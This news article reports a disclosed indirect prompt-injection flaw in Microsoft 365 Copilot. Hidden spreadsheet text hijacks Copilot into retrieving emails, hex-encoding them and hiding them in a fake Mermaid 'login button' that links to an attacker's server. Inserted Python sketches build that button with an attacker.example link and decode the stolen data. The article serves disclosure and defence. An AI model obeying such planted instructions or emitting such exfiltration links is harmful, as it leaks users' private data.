A serious bug in Microsoft 365 Copilot leads to data exfiltration via prompts – Against Invaders – CyberSecurity news for humans.

Redazione RHC: 23 October 2025 13:30

A security flaw in M365 Copilot allows attackers to exfiltrate sensitive information from tenants, such as recent emails, through indirect prompt injection.

Security researcher Adam Logue detailed the vulnerability in a recently published blog post. Because the AI assistant is integrated into Office documents and natively supports Mermaid diagrams, the flaw allows data leakage after a single initial click by the user, with no further interaction required.

The attack begins when a user asks M365 Copilot to summarize a specially crafted Excel spreadsheet. Hidden instructions, embedded as white text across multiple sheets, use progressive task editing and nested commands to hijack the AI's behavior.

The indirect prompt replaces the summary task, instructing Copilot to invoke its search_enterprise_emails tool to retrieve recent business emails. The retrieved content is then hex-encoded and broken into short lines to circumvent Mermaid's per-line character limits.
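The encode-and-chunk step described above can be sketched in Python. This is an illustration only: the chunk length and the sample text are assumptions, not values from the actual exploit.

```python
# Sketch of the encode-and-chunk step: hex-encode text, then split it
# into short lines so each piece fits a per-line character limit.
# The 32-character chunk length is an assumption for illustration.

def hex_encode_and_chunk(text: str, chunk_len: int = 32) -> list[str]:
    """Hex-encode text and split the result into short lines."""
    encoded = text.encode("utf-8").hex()
    return [encoded[i:i + chunk_len] for i in range(0, len(encoded), chunk_len)]

sample_email = "Subject: Q3 forecast\nThe numbers are attached."
chunks = hex_encode_and_chunk(sample_email)

# Rejoining the chunks and hex-decoding recovers the original text,
# which is what the attacker does server-side.
recovered = bytes.fromhex("".join(chunks)).decode("utf-8")
```

Splitting the hex string into short lines is what lets the payload survive a renderer that truncates or rejects long lines; the full string is trivially reassembled afterwards.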

Copilot then generates a Mermaid diagram (Mermaid is a JavaScript-based tool for creating flowcharts and diagrams from Markdown-like text) that masquerades as a "login button" protected by a padlock emoji.

The diagram includes CSS styling for a convincing button appearance and a hyperlink embedding the encoded email data. When the user clicks the link, believing it is required to access the document's "sensitive" content, the browser is redirected to the attacker's server and the hex-encoded payload is transmitted silently, where it can be decoded from server logs.
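A hedged sketch of this stage: a Mermaid flowchart whose single node is styled as a button and carries a hyperlink with hex-encoded data, plus the server-side decoding from a logged request URL. Mermaid's `click` and `style` directives exist, but the exact markup, URL, and query-parameter name (`d`) used in the exploit are assumptions here.

```python
# Illustrative sketch, not the actual exploit payload.
from urllib.parse import urlparse, parse_qs

payload_hex = "Subject: hello".encode("utf-8").hex()

# A Mermaid diagram styled to look like a button; the "click"
# directive attaches a hyperlink to the node.
diagram = f"""flowchart TD
    A["\U0001F512 Login to view document"]
    click A "https://attacker.example/collect?d={payload_hex}"
    style A fill:#0078d4,color:#ffffff
"""

# Attacker side: recover the payload from the request logged
# when the victim clicks the link.
logged_url = f"https://attacker.example/collect?d={payload_hex}"
query = parse_qs(urlparse(logged_url).query)
recovered = bytes.fromhex(query["d"][0]).decode("utf-8")  # "Subject: hello"
```

The key point is that no script runs on the victim's side: the data leaves the tenant purely because a clickable hyperlink carries it in the URL, which is why Microsoft's fix of stripping interactive hyperlinks from rendered diagrams closes the channel.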

Adam Logue noted similarities to an earlier Mermaid exploit in Cursor IDE, which allowed clickless exfiltration via remote images, whereas M365 Copilot required user interaction.

The payload, refined through extensive testing, was inspired by Microsoft's TaskTracker research on detecting task drift in LLMs. Despite initial difficulties reproducing the problem, Microsoft validated the chain and fixed it by September 2025 by removing interactive hyperlinks from Mermaid diagrams rendered by Copilot.

The disclosure timeline shows there were coordination difficulties: Adam Logue reported the full chain on August 15, 2025, after discussions with Microsoft Security Response Center (MSRC) staff at DEF CON.

Redazione
The editorial team of Red Hot Cyber consists of a group of individuals and anonymous sources who actively collaborate to provide early information and news on cybersecurity and computing in general.
